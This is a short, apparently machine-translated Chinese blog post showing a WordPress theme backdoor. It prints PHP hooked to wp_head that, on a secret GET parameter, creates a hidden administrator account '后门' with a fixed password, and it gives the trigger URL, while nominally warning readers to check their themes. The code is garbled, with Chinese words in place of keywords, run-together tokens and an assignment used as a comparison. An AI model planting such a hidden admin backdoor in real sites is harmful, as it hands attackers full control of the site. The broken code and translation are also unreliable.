给WordPress主题留个侧门只需要两行代码,所以要小心。
复制以下代码:
Add_Action('WP_Head','My_backdoor');
functionmy_backdoor(){
if(MD5($_GET['backdoor'])='34D1f91FB2e514b8576fab1a75a89a6b'){
require('WP-includes/registration.PHP');
如果(!username_exists('后门'){
$user_id=wp_create_user('后门','pa55w0rd!');
$User=newWP_User($User_id);
$user->;set_role('管理员');
}
}
}
简单地说,代码的关键在functions.php文件中,它不容易危及所有应用程序。如果有这个代码,大家应该 *** 作http://www.yourwebsitedomainname.com/?后门=go,然后建立了一个名为“后门”的客户,登录密码为“pa55w0rd!”管理人员。我有和管理者一样的管理权限,非常擅长写主题代码文档。我坚信,此时此刻你一定感到非常危险。请快速检查您自己的主题代码...
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)